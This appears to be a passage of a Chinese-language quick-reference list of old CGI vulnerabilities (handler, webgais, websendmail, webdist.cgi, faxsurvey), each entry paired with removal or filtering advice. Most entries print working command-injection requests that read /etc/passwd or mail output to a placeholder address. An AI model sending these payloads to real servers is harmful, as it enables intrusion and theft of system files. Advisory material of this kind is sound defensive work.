CGI安全漏洞资料速查v1.0

　　　统文件可以被入侵者读取的漏洞
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：删除php.cgi程序是最好的办法

类型：攻击型
名字：handler
风险等级：低
描述：IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在缓存溢出
　　　错误，允许入侵者在server上远程执行一段程序:
　　　telnettarget.machine.com80
　　　GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download
　　　HTTP/1.0
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：删除handler文件

类型：攻击型
名字：webgais
风险等级：高
描述：/cgi-bin，目录下的webgais是GAIS搜索工具的一个接口,它有一个
　　　毛病使入侵者可以绕过程序的安全机制，执行系统命令:
　　　POST/cgi-bin/webgaisHTTP/1.0
　　　Content-length:85(replacethiswiththeactuallengthof
　　　the"exploit"line)
　　　telnettarget.machine.com80query=';mail+you\@your.host
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：删除webgais文件

类型：攻击型
名字：websendmail
风险等级：高
描述：/cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:
　　　telnettarget.machine.com80
　　　POST/cgi-bin/websendmailHTTP/1.0
　　　Content-length:xxx(shouldbereplacedwiththeactual
　　　lengthofthestringpassedtotheserver,inthiscase
　　　xxx=90)　receiver=;mail+your_address\@somewhere.org
　　　&content=a
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：高级用户:编辑websendmail脚本,过滤特殊字符
一般用户：删除websendmail文件

类型：攻击型
名字：webdist.cgi
风险等级：高
描述：对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点
　　　允许入侵者无须登录而在系统上执行任何指令:
　　　http://host/cgi-bin/webdist.cgi?distloc=;cat /etc/passwd
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi

类型：攻击型
名字：faxsurvey
风险等级：高
描述：在LinuxS.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无
　　　须登录就能在服务器执行指令:http://joepc.linux.elsewhere.org/
　　　cgi-bin/faxsurvey?/bin/cat /etc/passwd
建议：建议审核cgi-bin目录，避免有不必要的程序存在
解决方法：删除/cgi-bin/faxsurvey文件

上一页 下一页